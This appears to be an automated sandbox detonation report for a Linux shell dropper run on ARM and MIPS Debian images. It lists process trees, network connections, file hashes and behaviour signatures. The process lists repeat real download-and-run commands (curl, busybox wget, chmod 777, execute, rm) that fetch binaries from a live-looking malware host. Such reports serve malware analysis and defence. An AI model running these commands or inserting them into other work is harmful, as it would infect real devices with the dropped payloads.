[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
Files
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-16 04:16
Reported
2024-12-16 04:52
Platform
debian9-armhf-20240611-en
Max time kernel
598s
Max time network
313s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-16 04:16
Reported
2024-12-16 04:52
Platform
debian9-mipsbe-20240611-en
Max time kernel
416s
Max time network
419s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
